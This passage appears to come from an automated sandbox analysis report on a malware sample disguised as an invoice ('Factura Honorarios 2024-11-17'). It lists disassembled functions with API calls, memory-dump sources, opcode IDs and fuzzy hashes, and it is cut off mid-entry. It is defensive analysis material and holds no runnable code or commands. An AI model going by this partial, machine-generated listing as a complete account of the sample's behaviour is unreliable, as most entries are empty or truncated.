                                                                                                                                  • Associated: 00000003.00000002.2657189932.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657213648.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                  • String ID: $M$N
                                                                                                                                  • API String ID: 1638840714-813528018
                                                                                                                                  • Opcode ID: d0ab387dba1094753cc2861ad9fb0d9ca09aa5e33736c44ba4ea0e36dbbc038f
                                                                                                                                  • Instruction ID: eb67e1f84f539b9e971c37d3801f2636e85636a2c3494a43e8d053fef61581d0
                                                                                                                                  • Opcode Fuzzy Hash: d0ab387dba1094753cc2861ad9fb0d9ca09aa5e33736c44ba4ea0e36dbbc038f
                                                                                                                                  • Instruction Fuzzy Hash: E6027EB0A00209EFDB209F55CD45AAE7BB9FB44314F10857AF610BA2E1C7799E52CF58
                                                                                                                                  Function 00405996 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 148filestringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • DeleteFileW.KERNEL32(?,?,00437800,75573420,00000000), ref: 004059BF
                                                                                                                                  • lstrcatW.KERNEL32(004256F0,\*.*,004256F0,?,?,00437800,75573420,00000000), ref: 00405A07
                                                                                                                                  • lstrcatW.KERNEL32(?,0040A014,?,004256F0,?,?,00437800,75573420,00000000), ref: 00405A2A
                                                                                                                                  • lstrlenW.KERNEL32(?,?,0040A014,?,004256F0,?,?,00437800,75573420,00000000), ref: 00405A30
                                                                                                                                  • FindFirstFileW.KERNEL32(004256F0,?,?,?,0040A014,?,004256F0,?,?,00437800,75573420,00000000), ref: 00405A40
                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AE0
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00405AEF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2657137036.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657173736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657189932.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657213648.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                  • String ID: \*.*
                                                                                                                                  • API String ID: 2035342205-1173974218
                                                                                                                                  • Opcode ID: d3b1db4ec6e858d6de83fe0182b98463dfe8c84cfbcf579265b0cac0546164ac
                                                                                                                                  • Instruction ID: c51eb27d53b6fe35fd8e31d26e19e594c53701a60ebafcf50548af423f91ca56
                                                                                                                                  • Opcode Fuzzy Hash: d3b1db4ec6e858d6de83fe0182b98463dfe8c84cfbcf579265b0cac0546164ac
                                                                                                                                  • Instruction Fuzzy Hash: 0641B530A00914AACB21BB658C89BAF7778EF45729F60427FF801711D1D7BC5981DEAE
                                                                                                                                  Function 0040698E Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2657137036.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657173736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657189932.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657213648.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 0ca90ec9e464192c9522d3965182f3407f0f46d2e5c2ee50019c84c966272eaf
                                                                                                                                  • Instruction ID: 13591abb153405db8c483c3749d8f5c5d6ef56c483b3dbf0ce0e93ae11c78ade
                                                                                                                                  • Opcode Fuzzy Hash: 0ca90ec9e464192c9522d3965182f3407f0f46d2e5c2ee50019c84c966272eaf
                                                                                                                                  • Instruction Fuzzy Hash: 58F17871D04269CBDF18CFA8C8946ADBBB0FF44305F25856ED456BB281D3386A8ACF45
                                                                                                                                  Function 004065C7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • FindFirstFileW.KERNEL32(00437800,00426738,00425EF0,00405CAA,00425EF0,00425EF0,00000000,00425EF0,00425EF0,00437800,?,75573420,004059B6,?,00437800,75573420), ref: 004065D2
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 004065DE
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2657137036.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657173736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657189932.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657213648.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                                  • String ID: 8gB
                                                                                                                                  • API String ID: 2295610775-1733800166
                                                                                                                                  • Opcode ID: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                                                                                                                  • Instruction ID: 17231fcebe31093dbb05a9ce9100934524038fc54cbd693a8662f86860803725
                                                                                                                                  • Opcode Fuzzy Hash: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                                                                                                                  • Instruction Fuzzy Hash: 46D012315450206BC60517387D0C84BBA589F653357128A37F466F51E4C734CC628698
                                                                                                                                  Function 38F80B30 Relevance: .7, Instructions: 709COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 9a5daec0362a63ace60868939951efb5e1adf402cf4c8843a076997a382b64bd
                                                                                                                                  • Instruction ID: b3581a70fb0f2bb11af8eeac51217697aa1e536facafb6f84a44ff150e12fdb7
                                                                                                                                  • Opcode Fuzzy Hash: 9a5daec0362a63ace60868939951efb5e1adf402cf4c8843a076997a382b64bd
                                                                                                                                  • Instruction Fuzzy Hash: 0272AF74E01229CFEB64DF69C984BD9BBB2BB89301F5485E9D448A7351DB309E81CF50
                                                                                                                                  Function 38F80040 Relevance: .6, Instructions: 596COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 1453fbee56195d72a77c7ea7ff6d92055ff6e6e8264afe5fd7d969b0ac3ae57d
                                                                                                                                  • Instruction ID: 814d73ff454b90e8af321f10f09ee8a387a42f9448963d26bf7da8c819e7e6c1
                                                                                                                                  • Opcode Fuzzy Hash: 1453fbee56195d72a77c7ea7ff6d92055ff6e6e8264afe5fd7d969b0ac3ae57d
                                                                                                                                  • Instruction Fuzzy Hash: B5529B74E01228CFDB64DF69C880B9DBBB2BF89301F5085EAD909A7255DB319E85CF50
                                                                                                                                  Function 39211828 Relevance: .3, Instructions: 292COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688216836.0000000039210000.00000040.00000800.00020000.00000000.sdmp, Offset: 39210000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39210000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a3442f38691a47c417302391d250e6c7f2ea3c47095a149ff1f0a16d02a0f455
                                                                                                                                  • Instruction ID: 6ce3dd143dc272dae3e14358e7d3c7a9116a99755c6e8cab5b1d351b8578769e
                                                                                                                                  • Opcode Fuzzy Hash: a3442f38691a47c417302391d250e6c7f2ea3c47095a149ff1f0a16d02a0f455
                                                                                                                                  • Instruction Fuzzy Hash: D7D19E74E00218CFEB54DFA5C994B9DBBB2BF89300F1081A9D809AB355DB359E82DF51
                                                                                                                                  Function 39210508 Relevance: .3, Instructions: 292COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688216836.0000000039210000.00000040.00000800.00020000.00000000.sdmp, Offset: 39210000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39210000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 4a7bdfb469fcb0a9df1244804fa2c4257fc0754a937e2d69656e79bd0083d0b6
                                                                                                                                  • Instruction ID: 68350942a36f146f5217cc873bab63b67a742d326a3a71b79c61fe13e98b4c90
                                                                                                                                  • Opcode Fuzzy Hash: 4a7bdfb469fcb0a9df1244804fa2c4257fc0754a937e2d69656e79bd0083d0b6
                                                                                                                                  • Instruction Fuzzy Hash: 31D19F74E00218CFEB54DFA5C994B9DBBB2BF89300F6081A9D409AB354DB359E82CF51
                                                                                                                                  Function 39211360 Relevance: .3, Instructions: 292COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688216836.0000000039210000.00000040.00000800.00020000.00000000.sdmp, Offset: 39210000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39210000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 90c5fa301cc5f38da430f843c005af0489795c4bb048fc90dc9220716f4072df
                                                                                                                                  • Instruction ID: 1b0be40e8d2fa91ca16ae39baf258df575ab33798fc6cc063ade5ef3cfc7987e
                                                                                                                                  • Opcode Fuzzy Hash: 90c5fa301cc5f38da430f843c005af0489795c4bb048fc90dc9220716f4072df
                                                                                                                                  • Instruction Fuzzy Hash: 45D18E74E00218CFEB54DFA5C994B9DBBB2BF89300F5081A9D809AB355DB359E82DF50
                                                                                                                                  Function 39210040 Relevance: .3, Instructions: 292COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688216836.0000000039210000.00000040.00000800.00020000.00000000.sdmp, Offset: 39210000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39210000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 938d3aeab2f79237c96f3cd5677da81e7f5919cf6c273861d637328d7ad24b21
                                                                                                                                  • Instruction ID: d1f7964cf3235fa7d6943beee95ccd22de94f46bf46ca79784da5d5f9c8dcdde
                                                                                                                                  • Opcode Fuzzy Hash: 938d3aeab2f79237c96f3cd5677da81e7f5919cf6c273861d637328d7ad24b21
                                                                                                                                  • Instruction Fuzzy Hash: 14D18E74E00218CFEB54DFA5C994B9DBBB2BB89300F5081A9D809AB354DB359E86DF50
                                                                                                                                  Function 39210E98 Relevance: .3, Instructions: 292COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688216836.0000000039210000.00000040.00000800.00020000.00000000.sdmp, Offset: 39210000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39210000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 0409039539e5f7911517ee6178cd3d666ae1e14889c080ae3bcd71c67ac12cbe
                                                                                                                                  • Instruction ID: d7e33bc090eedbf01f6decb0b6b8ea08c5ef81bab0d94c12d75902dc6bb10eae
                                                                                                                                  • Opcode Fuzzy Hash: 0409039539e5f7911517ee6178cd3d666ae1e14889c080ae3bcd71c67ac12cbe
                                                                                                                                  • Instruction Fuzzy Hash: 5FD19E74E00218CFEB54DFA5C994B9DBBF2BB89300F1081A9D809AB355DB359E82DF50
                                                                                                                                  Function 392109D0 Relevance: .3, Instructions: 292COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688216836.0000000039210000.00000040.00000800.00020000.00000000.sdmp, Offset: 39210000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39210000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 674fbf042d709c4d55c9d582d7efde037b2df4db6dad324659f34e4b4136cf6f
                                                                                                                                  • Instruction ID: 7ab1f0710983d055258fecb3becd515533f1cc727962cc0204abbdef1df0fc7f
                                                                                                                                  • Opcode Fuzzy Hash: 674fbf042d709c4d55c9d582d7efde037b2df4db6dad324659f34e4b4136cf6f
                                                                                                                                  • Instruction Fuzzy Hash: D1D18E74E00218CFEB54DFA5C994B9DBBB2BF89300F5081A9D809AB354DB359E82DF51
                                                                                                                                  Function 391EC618 Relevance: .3, Instructions: 292COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688111439.00000000391E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 391E0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_391e0000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b78edb051c9d2d4deff99f64c36349226b7eb79cda1240362c1c323abfae3588
                                                                                                                                  • Instruction ID: 00bb67f8d5b5d9454b255dd37eb105c90d8aafd07433cd1651716e36a0f4fc59
                                                                                                                                  • Opcode Fuzzy Hash: b78edb051c9d2d4deff99f64c36349226b7eb79cda1240362c1c323abfae3588
                                                                                                                                  • Instruction Fuzzy Hash: F2D19E74E00218CFEB54DFA5C994B9DBBB2BF89300F5081A9D809AB354DB359E81DF50
                                                                                                                                  Function 391E9B10 Relevance: .3, Instructions: 292COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688111439.00000000391E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 391E0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_391e0000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 4820a5766794770b0c049b312b6bbec86732cbe122d060eb527c14323720c934
                                                                                                                                  • Instruction ID: b87128ed438aaf43c3bc8b71c47c1bea484a72788d1fc008bb334be8eaec82f9
                                                                                                                                  • Opcode Fuzzy Hash: 4820a5766794770b0c049b312b6bbec86732cbe122d060eb527c14323720c934
                                                                                                                                  • Instruction Fuzzy Hash: 6ED18D74E00318CFEB54DFA5C994B9DBBB2BB89300F5081A9D809AB354DB359E82DF50
                                                                                                                                  Function 391E7008 Relevance: .3, Instructions: 292COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688111439.00000000391E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 391E0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_391e0000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 13eba32095ab881496f1495e87636b299fe5fcfe321837e10487a8f4c756bbe4
                                                                                                                                  • Instruction ID: 4b51eb0cd4b1e5128743d852d9a0f2dc7585c0abd7305f8ea8f4bc7cf33850a0
                                                                                                                                  • Opcode Fuzzy Hash: 13eba32095ab881496f1495e87636b299fe5fcfe321837e10487a8f4c756bbe4
                                                                                                                                  • Instruction Fuzzy Hash: 13D19E74E00218CFEB54DFA9C994B9DBBB2BF89300F1081A9D809AB355DB359E81DF50
                                                                                                                                  Function 391EDE00 Relevance: .3, Instructions: 292COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688111439.00000000391E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 391E0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_391e0000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 8b6dc211f0d5df7df64967e61c604221e62a5bc1124699acb39b3dd8e876b3e6
                                                                                                                                  • Instruction ID: 9fba6335b9dc72e7e912bd128b4806cbfb748b38f9d9ab105df2b87e209c736d
                                                                                                                                  • Opcode Fuzzy Hash: 8b6dc211f0d5df7df64967e61c604221e62a5bc1124699acb39b3dd8e876b3e6
                                                                                                                                  • Instruction Fuzzy Hash: 7BD19E74E00218CFEB54DFA5C994B9DBBB2BF89300F5081A9D809AB354DB359E82DF51
                                                                                                                                  Function 3917B318 Relevance: .3, Instructions: 272COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f78ce22e842974ddb10225e48b3d4d2781855cb81c3de9a692d59c3d95bb0e87
                                                                                                                                  • Instruction ID: 7fea337a1d77b41550be3b800f98a2b5cafde12adf6633b25c4587c364fd7946
                                                                                                                                  • Opcode Fuzzy Hash: f78ce22e842974ddb10225e48b3d4d2781855cb81c3de9a692d59c3d95bb0e87
                                                                                                                                  • Instruction Fuzzy Hash: 58D19D78E003188FEB55DFA9C980B9DBBB2AF89300F1081A9D809BB355DB315D82DF51
                                                                                                                                  Function 3917D308 Relevance: .3, Instructions: 272COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a7e4768ddea803476ae435543726c8c568ec061dee530feb288f23d6129ad651
                                                                                                                                  • Instruction ID: 70cde09cfc07e999eb65b96631dbcd9606d7595e9e61f8a9629c77cc1ffff9b1
                                                                                                                                  • Opcode Fuzzy Hash: a7e4768ddea803476ae435543726c8c568ec061dee530feb288f23d6129ad651
                                                                                                                                  • Instruction Fuzzy Hash: BAD19D78E002188FEB55DFA9C990B9DBBB2BF89304F1081A9D909BB354DB315D82DF51
                                                                                                                                  Function 3917C558 Relevance: .3, Instructions: 272COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 94af65a7347d119286c302f8ede999f6f946c3fe6b880cce897b8966cb4353db
                                                                                                                                  • Instruction ID: 0dc9fa87af3898dc7797d59e8d5e67f1b90e9e96a660345a49544eab1907b207
                                                                                                                                  • Opcode Fuzzy Hash: 94af65a7347d119286c302f8ede999f6f946c3fe6b880cce897b8966cb4353db
                                                                                                                                  • Instruction Fuzzy Hash: 53D19C78E00218CFEB55DFA9C990B9DBBB2AF89300F5081A9D909BB354DB315D82DF51
                                                                                                                                  Function 3917E548 Relevance: .3, Instructions: 272COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f32612cea00b030e5a44ae45364dc669095af634cd4e53b41621f71677d86e3f
                                                                                                                                  • Instruction ID: da4e79aca4f04bb42ebfe43ceed09f8240db7a8031482cd1b34ba100e0d1f343
                                                                                                                                  • Opcode Fuzzy Hash: f32612cea00b030e5a44ae45364dc669095af634cd4e53b41621f71677d86e3f
                                                                                                                                  • Instruction Fuzzy Hash: 01D19E78E002188FEB54CFA9C940B9DBBB2AF89300F1081A9D909BB364DB315D81DF51
                                                                                                                                  Function 3917D798 Relevance: .3, Instructions: 272COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: ec591a9a6713f29ef72e53ed80eb1c57d670d52f674ec10c1eb7080ec56348cb
                                                                                                                                  • Instruction ID: 659063ec8f62a8a533bff905d890b54dc1c21e9a274099f66d575ff2cbf78bad
                                                                                                                                  • Opcode Fuzzy Hash: ec591a9a6713f29ef72e53ed80eb1c57d670d52f674ec10c1eb7080ec56348cb
                                                                                                                                  • Instruction Fuzzy Hash: 04D19D78E002188FEB54DFA9C980B9DBBB2BF89300F1081A9D909BB354DB315A81DF51
                                                                                                                                  Function 3917F788 Relevance: .3, Instructions: 272COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c3862db68b0afcaad77ce33ca084b512e3ce58dbe40c1c1b6117838e71c0d43f
                                                                                                                                  • Instruction ID: f63306095adeb08cbd9aa3ef89affef4f8cb70fcc995ac1d40661ec2bbdd7ce8
                                                                                                                                  • Opcode Fuzzy Hash: c3862db68b0afcaad77ce33ca084b512e3ce58dbe40c1c1b6117838e71c0d43f
                                                                                                                                  • Instruction Fuzzy Hash: F9D19E78E002188FEB55DFA9C950B9DBBB2AF89300F1081A9D909BB354DB355D81DF51
                                                                                                                                  Function 3917B7A8 Relevance: .3, Instructions: 272COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 10d283343a5035f5211a4f97a4261b73621eb8f672abfde9a493988d0480497a
                                                                                                                                  • Instruction ID: f59620d49279a2e471e645a15c086bcff1d0b5420e5357625549facd8432470b
                                                                                                                                  • Opcode Fuzzy Hash: 10d283343a5035f5211a4f97a4261b73621eb8f672abfde9a493988d0480497a
                                                                                                                                  • Instruction Fuzzy Hash: 52D19C78E003188FEB55DFA9C990B9DBBB2AF89300F1081A9D909BB354DB355982DF51
                                                                                                                                  Function 3917E9D8 Relevance: .3, Instructions: 272COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b603a4e2ec53eb797cf61764b8e589b13d252429d0e7fa048dfc40ee52f73dd3
                                                                                                                                  • Instruction ID: 431893a6879d5ca128b8d824cdf0ae299026cf6b05a7ae296548a52332f575b9
                                                                                                                                  • Opcode Fuzzy Hash: b603a4e2ec53eb797cf61764b8e589b13d252429d0e7fa048dfc40ee52f73dd3
                                                                                                                                  • Instruction Fuzzy Hash: 74D18D78E002188FEB55DFA9C990B9DBBB2BF89300F1081A9D909BB365DB315D81DF51
                                                                                                                                  Function 3917C9E8 Relevance: .3, Instructions: 272COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: dd2e5537a49d2d5a53f73bcc7f6c1b7d7db88cffc8f53c79ecbc6bf11e30dea9
                                                                                                                                  • Instruction ID: 3a23055f1d9187503724a6f9c11513cb60279c799d7bc7671d3aaedb5b0b8f72
